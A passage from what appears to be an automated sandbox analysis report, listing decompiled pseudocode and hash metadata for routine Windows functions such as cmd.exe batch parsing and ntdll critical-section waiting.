                                                      						if( *0x4a75408c == 1) {
                                                      							__eflags =  *0x4a7706ac; // 0x0
                                                      							if(__eflags == 0) {
                                                      								E4A73C60C(0, _t71, _t72, _t75, __eflags);
                                                      								E4A7399E1(_t69, 0x2371, 1, 0x4a76c642);
                                                      								_t76 = _t76 + 0xc;
                                                      							}
                                                      						}
                                                      						E4A74FCA6(0, _t69, _t71, _t72, _t75);
                                                      					}
                                                      					if(_t75 == 0xffffffff) {
                                                      						goto L23;
                                                      					} else {
                                                      						if(_v12 != 0) {
                                                      							__eflags = _t75;
                                                      							if(_t75 != 0) {
                                                      								_v12 = 0;
                                                      							}
                                                      						}
                                                      						_t46 =  *_t75;
                                                      						if(_t46 != 0) {
                                                      							L11:
                                                      							if(_v16 != 0) {
                                                      								_v16 = 0;
                                                      								L13:
                                                      								if( *_t75 == 0x3b) {
                                                      									L20:
                                                      									_t75 =  *((intOrPtr*)(_t75 + 0x38));
                                                      								}
                                                      								if(_t75 == 0) {
                                                      									L38:
                                                      									_v8 = 0;
                                                      									goto L18;
                                                      								}
                                                      								if( *_t75 != 0 || E4A7340F2(0x2a,  *((intOrPtr*)(_t75 + 0x38)), 0x4a768640) != 0xffffffff) {
                                                      									L17:
                                                      									_v8 = E4A731492(2, _t75);
                                                      									E4A731605();
                                                      									_t49 = GetConsoleOutputCP();
                                                      									 *0x4a7541b8 = _t49;
                                                      									GetCPInfo(_t49, 0x4a754260);
                                                      									_push(0);
                                                      									E4A731690();
                                                      									goto L18;
                                                      								} else {
                                                      									_t53 = E4A7318EB( *((intOrPtr*)(_t75 + 0x38)), 0x2a);
                                                      									__eflags = _t53;
                                                      									if(_t53 != 0) {
                                                      										goto L17;
                                                      									}
                                                      									_t54 = E4A7318EB( *((intOrPtr*)(_t75 + 0x38)), 0x3f);
                                                      									__eflags = _t54;
                                                      									if(_t54 != 0) {
                                                      										goto L17;
                                                      									}
                                                      									_t55 = E4A733370(0, _t75, 0x4a768640, 0x2000);
                                                      									__eflags = _t55 - 2;
                                                      									if(_t55 != 2) {
                                                      										goto L17;
                                                      									}
                                                      									__eflags =  *((intOrPtr*)(_t75 + 0x34));
                                                      									if(__eflags != 0) {
                                                      										__eflags = E4A74E8B8(_a8, _t75);
                                                      										if(__eflags == 0) {
                                                      											goto L36;
                                                      										}
                                                      										goto L42;
                                                      									}
                                                      									L36:
                                                      									_t58 = E4A735C8C(0, 0x4a768640, _t75, __eflags, _t75,  *_a4,  *((intOrPtr*)(_a4 + 4)));
                                                      									__eflags = _t58;
                                                      									if(_t58 != 0) {
                                                      										goto L42;
                                                      									}
                                                      									_v12 = 1;
                                                      									goto L38;
                                                      								}
                                                      							}
                                                      							if( *0x4a75408c == 1) {
                                                      								__eflags = _t46 - 0x3b;
                                                      								if(_t46 == 0x3b) {
                                                      									goto L20;
                                                      								}
                                                      								__eflags =  *0x4a7706ac; // 0x0
                                                      								if(__eflags == 0) {
                                                      									E4A73C60C(0, _t71, _t72, _t75, __eflags);
                                                      									E4A73CB29(_t75, 0);
                                                      									E4A7358F3();
                                                      									_t69 = 0x4a7545a8;
                                                      								}
                                                      							}
                                                      							goto L13;
                                                      						} else {
                                                      							_t69 =  *((intOrPtr*)(_t75 + 0x38));
                                                      							if( *_t69 == 0x3a) {
                                                      								goto L18;
                                                      							}
                                                      							goto L11;
                                                      						}
                                                      					}
                                                      				}
                                                      			}






























                                                      APIs
                                                      • _tell.MSVCRT ref: 4A734C6D
                                                      • GetConsoleOutputCP.KERNEL32 ref: 4A734D16
                                                      • GetCPInfo.KERNEL32(00000000,4A754260,?,4A7315C5,4A754210,4A73745B,-00000003,00000000,00000000,00000000,00000000,?,00000004,?,4A754210,?), ref: 4A734D27
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: ConsoleInfoOutput_tell
                                                      • String ID: GOTO
                                                      • API String ID: 3312154647-1693823284
                                                      • Opcode ID: 0f4f5b7777692812dd9853371795632a6a143a4663bba80308bfaa9b8b7809d4
                                                      • Instruction ID: f89d0978d106e715bc1c6a751ac721985bfb66177a741218285806f7239c5ec8
                                                      • Opcode Fuzzy Hash: 0f4f5b7777692812dd9853371795632a6a143a4663bba80308bfaa9b8b7809d4
                                                      • Instruction Fuzzy Hash: 375145B294DA12FFDBB06FA1C9885897FB4EF05315F134429E2419B953D770898CCB62
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 44%
                                                      			E023753A5(signed int _a4, char _a8) {
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int _t32;
                                                      				signed int _t37;
                                                      				signed int _t40;
                                                      				signed int _t42;
                                                      				void* _t45;
                                                      				intOrPtr _t46;
                                                      				signed int _t49;
                                                      				void* _t51;
                                                      				signed int _t57;
                                                      				signed int _t64;
                                                      				signed int _t71;
                                                      				void* _t74;
                                                      				intOrPtr _t78;
                                                      				signed int* _t79;
                                                      				void* _t85;
                                                      				signed int _t86;
                                                      				signed int _t92;
                                                      				void* _t104;
                                                      				void* _t105;
                                                      
                                                      				_t64 = _a4;
                                                      				_t32 =  *(_t64 + 0x28);
                                                      				_t71 = _t64 + 0x28;
                                                      				_push(_t92);
                                                      				if(_t32 < 0) {
                                                      					_t78 =  *[fs:0x18];
                                                      					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                                      					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                                      						goto L3;
                                                      					} else {
                                                      						__eflags = _t32 | 0xffffffff;
                                                      						asm("lock xadd [ecx], eax");
                                                      						return 1;
                                                      					}
                                                      				} else {
                                                      					L3:
                                                      					_push(_t86);
                                                      					while(1) {
                                                      						L4:
                                                      						__eflags = _t32;
                                                      						if(_t32 == 0) {
                                                      							break;
                                                      						}
                                                      						__eflags = _a8;
                                                      						if(_a8 == 0) {
                                                      							__eflags = 0;
                                                      							return 0;
                                                      						} else {
                                                      							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                                      							_t79 = _t64 + 0x24;
                                                      							_t71 = 1;
                                                      							asm("lock xadd [eax], ecx");
                                                      							_t32 =  *(_t64 + 0x28);
                                                      							_a4 = _t32;
                                                      							__eflags = _t32;
                                                      							if(_t32 != 0) {
                                                      								L19:
                                                      								_t86 = 0;
                                                      								__eflags = 0;
                                                      								while(1) {
                                                      									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                                      									asm("sbb esi, esi");
                                                      									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x024301c0;
                                                      									_push(_t92);
                                                      									_push(0);
                                                      									_t37 = E0234F8CC( *((intOrPtr*)(_t64 + 0x20)));
                                                      									__eflags = _t37 - 0x102;
                                                      									if(_t37 != 0x102) {
                                                      										break;
                                                      									}
                                                      									_t71 =  *(_t92 + 4);
                                                      									_t85 =  *_t92;
                                                      									_t51 = E02394FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                                      									_push(_t85);
                                                      									_push(_t51);
                                                      									E023A3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                                      									E023A3F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                                      									_t86 = _t86 + 1;
                                                      									_t105 = _t104 + 0x28;
                                                      									__eflags = _t86 - 2;
                                                      									if(__eflags > 0) {
                                                      										E023D217A(_t71, __eflags, _t64);
                                                      									}
                                                      									_push("RTL: Re-Waiting\n");
                                                      									_push(0);
                                                      									_push(0x65);
                                                      									E023A3F92();
                                                      									_t104 = _t105 + 0xc;
                                                      								}
                                                      								__eflags = _t37;
                                                      								if(__eflags < 0) {
                                                      									_push(_t37);
                                                      									E02393915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                                      									asm("int3");
                                                      									_t40 =  *_t71;
                                                      									 *_t71 = 0;
                                                      									__eflags = _t40;
                                                      									if(_t40 == 0) {
                                                      										L1:
                                                      										_t42 = E02375384(_t92 + 0x24);
                                                      										if(_t42 != 0) {
                                                      											goto L31;
                                                      										} else {
                                                      											goto L2;
                                                      										}
                                                      									} else {
                                                      										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                                      										_push( &_a4);
                                                      										_push(_t40);
                                                      										_t49 = E0234F970( *((intOrPtr*)(_t92 + 0x18)));
                                                      										__eflags = _t49;
                                                      										if(__eflags >= 0) {
                                                      											goto L1;
                                                      										} else {
                                                      											_push(_t49);
                                                      											E02393915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                                      											L31:
                                                      											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                                      											_push( &_a4);
                                                      											_push(1);
                                                      											_t42 = E0234F970( *((intOrPtr*)(_t92 + 0x20)));
                                                      											__eflags = _t42;
                                                      											if(__eflags >= 0) {
                                                      												L2:
                                                      												return _t42;
                                                      											} else {
                                                      												_push(_t42);
                                                      												E02393915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                                      												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                                      												_push( &_a4);
                                                      												_push(1);
                                                      												_t42 = E0234F970( *((intOrPtr*)(_t92 + 0x20)));
                                                      												__eflags = _t42;
                                                      												if(__eflags >= 0) {
                                                      													goto L2;
                                                      												} else {
                                                      													_push(_t42);
                                                      													_t45 = E02393915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                                      													asm("int3");
                                                      													while(1) {
                                                      														_t74 = _t45;
                                                      														__eflags = _t45 - 1;
                                                      														if(_t45 != 1) {
                                                      															break;
                                                      														}
                                                      														_t86 = _t86 | 0xffffffff;
                                                      														_t45 = _t74;
                                                      														asm("lock cmpxchg [ebx], edi");
                                                      														__eflags = _t45 - _t74;
                                                      														if(_t45 != _t74) {
                                                      															continue;
                                                      														} else {
                                                      															_t46 =  *[fs:0x18];
                                                      															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                                      															return _t46;
                                                      														}
                                                      														goto L37;
                                                      													}
                                                      													E02375329(_t74, _t92);
                                                      													_push(1);
                                                      													return E023753A5(_t92);
                                                      												}
                                                      											}
                                                      										}
                                                      									}
                                                      								} else {
                                                      									_t32 =  *(_t64 + 0x28);
                                                      									continue;
                                                      								}
                                                      							} else {
                                                      								_t71 =  *_t79;
                                                      								__eflags = _t71;
                                                      								if(__eflags > 0) {
                                                      									while(1) {
                                                      										_t57 = _t71;
                                                      										asm("lock cmpxchg [edi], esi");
                                                      										__eflags = _t57 - _t71;
                                                      										if(_t57 == _t71) {
                                                      											break;
                                                      										}
                                                      										_t71 = _t57;
                                                      										__eflags = _t57;
                                                      										if(_t57 > 0) {
                                                      											continue;
                                                      										}
                                                      										break;
                                                      									}
                                                      									_t32 = _a4;
                                                      									__eflags = _t71;
                                                      								}
                                                      								if(__eflags != 0) {
                                                      									continue;
                                                      								} else {
                                                      									goto L19;
                                                      								}
                                                      							}
                                                      						}
                                                      						goto L37;
                                                      					}
                                                      					_t71 = _t71 | 0xffffffff;
                                                      					_t32 = 0;
                                                      					asm("lock cmpxchg [edx], ecx");
                                                      					__eflags = 0;
                                                      					if(0 != 0) {
                                                      						goto L4;
                                                      					} else {
                                                      						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                      						return 1;
                                                      					}
                                                      				}
                                                      				L37:
                                                      			}


                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 023B22F4
                                                      Strings
                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 023B22FC
                                                      • RTL: Resource at %p, xrefs: 023B230B
                                                      • RTL: Re-Waiting, xrefs: 023B2328
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.685565082.0000000002340000.00000040.00000001.sdmp, Offset: 02330000, based on PE: true
                                                      • Associated: 00000007.00000002.685502431.0000000002330000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685850131.0000000002420000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685861725.0000000002430000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685875850.0000000002434000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685886803.0000000002437000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685914274.0000000002440000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.686000770.00000000024A0000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 885266447-871070163
                                                      • Opcode ID: dbc7db733fd87c137160b90c8ae671d9db61cdb85f4e8cda53e29741ea13aabd
                                                      • Instruction ID: b63ba1b60e6be1788e474bd26cce4553da25a18a7a1425477fe85188dba68192
                                                      • Opcode Fuzzy Hash: dbc7db733fd87c137160b90c8ae671d9db61cdb85f4e8cda53e29741ea13aabd
                                                      • Instruction Fuzzy Hash: A451E4716007016BEF359F68DC80FA773E9EF49324F104669FE09DB690EB65E8418BA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 89%
                                                      			E4A74C391(intOrPtr _a4, wchar_t* _a8, intOrPtr _a12) {
                                                      				signed int _v8;
                                                      				char _v20;
                                                      				signed int _v24;
                                                      				void* _v28;
                                                      				intOrPtr _v32;
                                                      				signed short* _v36;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int _t38;
                                                      				void* _t41;
                                                      				wchar_t* _t42;
                                                      				void* _t47;
                                                      				int _t52;
                                                      				signed int _t56;
                                                      				signed int _t57;
                                                      				short* _t58;
                                                      				signed int _t59;
                                                      				long _t63;
                                                      				void _t64;
                                                      				signed int _t68;
                                                      				wchar_t* _t72;
                                                      				long _t74;
                                                      				void* _t75;
                                                      				signed int _t79;
                                                      				void* _t83;
                                                      				signed short* _t85;
                                                      				intOrPtr _t88;
                                                      				void* _t93;
                                                      				void* _t94;
                                                      				void* _t95;
                                                      				signed int _t97;
                                                      				signed int _t98;
                                                      				void* _t99;
                                                      
                                                      				_t38 =  *0x4a7540ac; // 0xbb40e64e
                                                      				_v8 = _t38 ^ _t98;
                                                      				_t72 = _a8;
                                                      				asm("movsd");
                                                      				asm("movsd");
                                                      				_t41 = _a4 + 8;
                                                      				_v24 = _v24 & 0x00000000;
                                                      				asm("movsw");
                                                      				_v32 = _a12;
                                                      				_v36 = _t41;
                                                      				_v28 = _t41;
                                                      				_t93 = 2;
                                                      				do {
                                                      					_t42 = _t72;
                                                      					_t90 =  &(_t42[0]);
                                                      					do {
                                                      						_t74 =  *_t42;
                                                      						_t42 = _t42 + _t93;
                                                      					} while (_t74 != 0);
                                                      					_t97 = _t42 - _t90 >> 1;
                                                      					if(_t97 > _t93 || iswdigit( *_t72 & 0x0000ffff) == 0) {
                                                      						break;
                                                      					} else {
                                                      						_t63 = _t72[0] & 0x0000ffff;
                                                      						if(_t63 == 0 || iswdigit(_t63) != 0) {
                                                      							_t64 = wcstol(_t72, 0, 0xa);
                                                      							_v28 = _v28 + _t93;
                                                      							_t72 = _t72 + 2 + _t97 * 2;
                                                      							 *_v28 = _t64;
                                                      							_t65 =  *_t72 & 0x0000ffff;
                                                      							_t99 = _t99 + 0xc;
                                                      							if(( *_t72 & 0x0000ffff) == 0) {
                                                      								L29:
                                                      								_v24 = _v24 + 1;
                                                      								_t75 = 4;
                                                      								if(_v24 < _t75) {
                                                      									_t94 = _v28;
                                                      									_t90 = 0 << 0x10;
                                                      									_t79 = _t75 - _v24 >> 1;
                                                      									_t52 = memset(_t94, 0xbadbad, _t79 << 2);
                                                      									_t95 = _t94 + _t79;
                                                      									asm("adc ecx, ecx");
                                                      									memset(_t95, _t52, 0);
                                                      									_t93 = _t95;
                                                      								}
                                                      								_t47 = 1;
                                                      								L32:
                                                      								return E4A7313A9(_t47, _t72, _v8 ^ _t98, _t90, _t93, _t97);
                                                      							}
                                                      							if(E4A7318EB( &_v20, _t65) != 0) {
                                                      								L17:
                                                      								_t56 =  *_t72 & 0x0000ffff;
                                                      								if(_t56 == 0x70 || _t56 == 0x50) {
                                                      									_t83 = 1;
                                                      								} else {
                                                      									_t83 = 0;
                                                      								}
                                                      								_t57 =  *_t72 & 0x0000ffff;
                                                      								if(_t57 == 0 || _t57 == 0x6d || _t57 == 0x4d) {
                                                      									if(_t83 == 0) {
                                                      										_t58 = _v36;
                                                      										if( *_t58 == 0xc) {
                                                      											 *_t58 = 0;
                                                      										}
                                                      									} else {
                                                      										_t85 = _v36;
                                                      										_t59 =  *_t85 & 0x0000ffff;
                                                      										if(_t59 != 0xc) {
                                                      											 *_t85 = _t59 + 0xc;
                                                      										}
                                                      									}
                                                      									goto L29;
                                                      								} else {
                                                      									L11:
                                                      									_t47 = 0;
                                                      									goto L32;
                                                      								}
                                                      							}
                                                      							_t68 =  *_t72 & 0x0000ffff;
                                                      							if(_v24 >= _t93) {
                                                      								_t88 = _v32;
                                                      								if(_t68 ==  *((intOrPtr*)(_t88 + 2)) || _t68 ==  *((intOrPtr*)(_t88 + 6))) {
                                                      									goto L14;
                                                      								} else {
                                                      									goto L11;
                                                      								}
                                                      							}
                                                      							if(E4A7318EB(_v32, _t68) != 0) {
                                                      								goto L14;
                                                      							}
                                                      							goto L11;
                                                      						} else {
                                                      							break;
                                                      						}
                                                      					}
                                                      					L14:
                                                      					_v24 = _v24 + 1;
                                                      					_t72 = E4A73413B(_t72);
                                                      				} while (_v24 < 4);
                                                      				_t45 =  *_t72 & 0x0000ffff;
                                                      				if(( *_t72 & 0x0000ffff) == 0) {
                                                      					goto L29;
                                                      				}
                                                      				if(E4A7318EB( &_v20, _t45) == 0) {
                                                      					goto L11;
                                                      				}
                                                      				goto L17;
                                                      			}






































                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: iswdigit$wcstol
                                                      • String ID: aApP
                                                      • API String ID: 644763121-2547155087
                                                      • Opcode ID: 0899b650b84909d18298231dc20e1af31ebf414ae6139e7b78b06dcff7783852
                                                      • Instruction ID: 6fd4dba2f406e7cdc06674605adab910af8ddab64e9a6574bc0770084103523b
                                                      • Opcode Fuzzy Hash: 0899b650b84909d18298231dc20e1af31ebf414ae6139e7b78b06dcff7783852
                                                      • Instruction Fuzzy Hash: E1511375A052168ADF60CBACC9416FE7FB8EF05351F52422AED42EB181E734C90AC771
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 51%
                                                      			E0237EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                      				intOrPtr _v8;
                                                      				intOrPtr _v12;
                                                      				signed int _v24;
                                                      				intOrPtr* _v28;
                                                      				intOrPtr _v32;
                                                      				signed int _v36;
                                                      				intOrPtr _v40;
                                                      				short _v66;
                                                      				char _v72;
                                                      				void* __esi;
                                                      				intOrPtr _t38;
                                                      				intOrPtr _t39;
                                                      				signed int _t40;
                                                      				intOrPtr _t42;
                                                      				intOrPtr _t43;
                                                      				signed int _t44;
                                                      				void* _t46;
                                                      				intOrPtr _t48;
                                                      				signed int _t49;
                                                      				intOrPtr _t50;
                                                      				intOrPtr _t53;
                                                      				signed char _t67;
                                                      				void* _t72;
                                                      				intOrPtr _t77;
                                                      				intOrPtr* _t80;
                                                      				intOrPtr _t84;
                                                      				intOrPtr* _t85;
                                                      				void* _t91;
                                                      				void* _t92;
                                                      				void* _t93;
                                                      
                                                      				_t80 = __edi;
                                                      				_t75 = __edx;
                                                      				_t70 = __ecx;
                                                      				_t84 = _a4;
                                                      				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
                                                      					E0236DA92(__ecx, __edx, __eflags, _t84);
                                                      					_t38 =  *((intOrPtr*)(_t84 + 0x10));
                                                      				}
                                                      				_push(0);
                                                      				__eflags = _t38 - 0xffffffff;
                                                      				if(_t38 == 0xffffffff) {
                                                      					_t39 =  *0x243793c; // 0x0
                                                      					_push(0);
                                                      					_push(_t84);
                                                      					_t40 = E023516C0(_t39);
                                                      				} else {
                                                      					_t40 = E0234F9D4(_t38);
                                                      				}
                                                      				_pop(_t85);
                                                      				__eflags = _t40;
                                                      				if(__eflags < 0) {
                                                      					_push(_t40);
                                                      					E02393915(_t67, _t70, _t75, _t80, _t85, __eflags);
                                                      					asm("int3");
                                                      					while(1) {
                                                      						L21:
                                                      						_t76 =  *[fs:0x18];
                                                      						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                      						__eflags =  *(_t42 + 0x240) & 0x00000002;
                                                      						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
                                                      							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
                                                      							_v66 = 0x1722;
                                                      							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                      							_t76 =  &_v72;
                                                      							_push( &_v72);
                                                      							_v28 = _t85;
                                                      							_v40 =  *((intOrPtr*)(_t85 + 4));
                                                      							_v32 =  *((intOrPtr*)(_t85 + 0xc));
                                                      							_push(0x10);
                                                      							_push(0x20402);
                                                      							E023501A4( *0x7ffe0382 & 0x000000ff);
                                                      						}
                                                      						while(1) {
                                                      							_t43 = _v8;
                                                      							_push(_t80);
                                                      							_push(0);
                                                      							__eflags = _t43 - 0xffffffff;
                                                      							if(_t43 == 0xffffffff) {
                                                      								_t71 =  *0x243793c; // 0x0
                                                      								_push(_t85);
                                                      								_t44 = E02351F28(_t71);
                                                      							} else {
                                                      								_t44 = E0234F8CC(_t43);
                                                      							}
                                                      							__eflags = _t44 - 0x102;
                                                      							if(_t44 != 0x102) {
                                                      								__eflags = _t44;
                                                      								if(__eflags < 0) {
                                                      									_push(_t44);
                                                      									E02393915(_t67, _t71, _t76, _t80, _t85, __eflags);
                                                      									asm("int3");
                                                      									E023D2306(_t85);
                                                      									__eflags = _t67 & 0x00000002;
                                                      									if((_t67 & 0x00000002) != 0) {
                                                      										_t7 = _t67 + 2; // 0x4
                                                      										_t72 = _t7;
                                                      										asm("lock cmpxchg [edi], ecx");
                                                      										__eflags = _t67 - _t67;
                                                      										if(_t67 == _t67) {
                                                      											E0237EC56(_t72, _t76, _t80, _t85);
                                                      										}
                                                      									}
                                                      									return 0;
                                                      								} else {
                                                      									__eflags = _v24;
                                                      									if(_v24 != 0) {
                                                      										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
                                                      									}
                                                      									return 2;
                                                      								}
                                                      								goto L36;
                                                      							}
                                                      							_t77 =  *((intOrPtr*)(_t80 + 4));
                                                      							_push(_t67);
                                                      							_t46 = E02394FC0( *_t80, _t77, 0xff676980, 0xffffffff);
                                                      							_push(_t77);
                                                      							E023A3F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
                                                      							_t48 =  *_t85;
                                                      							_t92 = _t91 + 0x18;
                                                      							__eflags = _t48 - 0xffffffff;
                                                      							if(_t48 == 0xffffffff) {
                                                      								_t49 = 0;
                                                      								__eflags = 0;
                                                      							} else {
                                                      								_t49 =  *((intOrPtr*)(_t48 + 0x14));
                                                      							}
                                                      							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                      							_push(_t49);
                                                      							_t50 = _v12;
                                                      							_t76 =  *((intOrPtr*)(_t50 + 0x24));
                                                      							_push(_t85);
                                                      							_push( *((intOrPtr*)(_t85 + 0xc)));
                                                      							_push( *((intOrPtr*)(_t50 + 0x24)));
                                                      							E023A3F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
                                                      							_t53 =  *_t85;
                                                      							_t93 = _t92 + 0x20;
                                                      							_t67 = _t67 + 1;
                                                      							__eflags = _t53 - 0xffffffff;
                                                      							if(_t53 != 0xffffffff) {
                                                      								_t71 =  *((intOrPtr*)(_t53 + 0x14));
                                                      								_a4 =  *((intOrPtr*)(_t53 + 0x14));
                                                      							}
                                                      							__eflags = _t67 - 2;
                                                      							if(_t67 > 2) {
                                                      								__eflags = _t85 - 0x24320c0;
                                                      								if(_t85 != 0x24320c0) {
                                                      									_t76 = _a4;
                                                      									__eflags = _a4 - _a8;
                                                      									if(__eflags == 0) {
                                                      										E023D217A(_t71, __eflags, _t85);
                                                      									}
                                                      								}
                                                      							}
                                                      							_push("RTL: Re-Waiting\n");
                                                      							_push(0);
                                                      							_push(0x65);
                                                      							_a8 = _a4;
                                                      							E023A3F92();
                                                      							_t91 = _t93 + 0xc;
                                                      							__eflags =  *0x7ffe0382;
                                                      							if( *0x7ffe0382 != 0) {
                                                      								goto L21;
                                                      							}
                                                      						}
                                                      						goto L36;
                                                      					}
                                                      				} else {
                                                      					return _t40;
                                                      				}
                                                      				L36:
                                                      			}


































                                                      Strings
                                                      • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 023B24BD
                                                      • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 023B248D
                                                      • RTL: Re-Waiting, xrefs: 023B24FA
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.685565082.0000000002340000.00000040.00000001.sdmp, Offset: 02330000, based on PE: true
                                                      • Associated: 00000007.00000002.685502431.0000000002330000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685850131.0000000002420000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685861725.0000000002430000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685875850.0000000002434000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685886803.0000000002437000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685914274.0000000002440000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.686000770.00000000024A0000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                      • API String ID: 0-3177188983
                                                      • Opcode ID: 9e64af4ae8ed36ef288cdc2085d6f6d5f7a9fef61d89e763e9081317d3445e61
                                                      • Instruction ID: 8e67ec912e5124709e768711c6186134c417b6716f8214e27d9209359095b486
                                                      • Opcode Fuzzy Hash: 9e64af4ae8ed36ef288cdc2085d6f6d5f7a9fef61d89e763e9081317d3445e61
                                                      • Instruction Fuzzy Hash: FE41C0B0600204ABDB34DF68DC85FAB77AAEF45320F108745FA599BAD1D734E9418B61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 78%
                                                      			E4A73C1E2(void* __edi, intOrPtr _a4) {
                                                      				signed int _v8;
                                                      				char _v528;
                                                      				signed short* _v532;
                                                      				void* __ebx;
                                                      				void* __esi;
                                                      				signed int _t15;
                                                      				signed short* _t19;
                                                      				signed short* _t25;
                                                      				signed int _t37;
                                                      				signed short* _t42;
                                                      				signed short _t49;
                                                      				signed short _t50;
                                                      				signed short* _t56;
                                                      				long _t57;
                                                      				signed short* _t59;
                                                      				signed short* _t63;
                                                      				signed int _t66;
                                                      				char _t67;
                                                      
                                                      				_t58 = __edi;
                                                      				_t15 =  *0x4a7540ac; // 0xbb40e64e
                                                      				_v8 = _t15 ^ _t66;
                                                      				_t67 =  *0x4a754081; // 0x0
                                                      				_t42 = E4A7322CA( *((intOrPtr*)(_a4 + 0x3c)), E4A733AFC, (0 | _t67 != 0x00000000) + 2);
                                                      				_v532 = _t42;
                                                      				if( *0x4a754081 != 0) {
                                                      					_t63 = _t42;
                                                      					if( *_t42 != 0) {
                                                      						_push(__edi);
                                                      						while(1) {
                                                      							L11:
                                                      							_t37 =  *_t42 & 0x0000ffff;
                                                      							 *_t63 = _t37;
                                                      							if(_t37 != 0) {
                                                      								break;
                                                      							}
                                                      							_t42 =  &(_t42[1]);
                                                      							while(1) {
                                                      								_t9 = _t63 - 2; // -4
                                                      								_t59 = _t9;
                                                      								if(iswspace( *_t59 & 0x0000ffff) == 0) {
                                                      									break;
                                                      								}
                                                      								_t63 = _t59;
                                                      							}
                                                      							 *_t63 = 0;
                                                      							_t63 =  &(_t63[1]);
                                                      							if( *_t42 != 0) {
                                                      								continue;
                                                      							}
                                                      							_t42 = _v532;
                                                      							_pop(_t58);
                                                      							goto L2;
                                                      						}
                                                      						_t42 =  &(_t42[1]);
                                                      						_t63 =  &(_t63[1]);
                                                      						goto L11;
                                                      					}
                                                      					L2:
                                                      					 *_t63 = 0;
                                                      				}
                                                      				_t19 = _t42;
                                                      				_t7 =  &(_t19[1]); // 0x2
                                                      				_t56 = _t7;
                                                      				do {
                                                      					_t49 =  *_t19;
                                                      					_t19 =  &(_t19[1]);
                                                      				} while (_t49 != 0);
                                                      				E4A73185A(_t42, (_t19 - _t56 >> 1) + 1, E4A732598(_t49, _t42));
                                                      				_t57 =  *_t42 & 0x0000ffff;
                                                      				if(_t57 != 0) {
                                                      					_t25 = _t42;
                                                      					_t11 =  &(_t25[1]); // 0x2
                                                      					_t62 = _t11;
                                                      					do {
                                                      						_t50 =  *_t25;
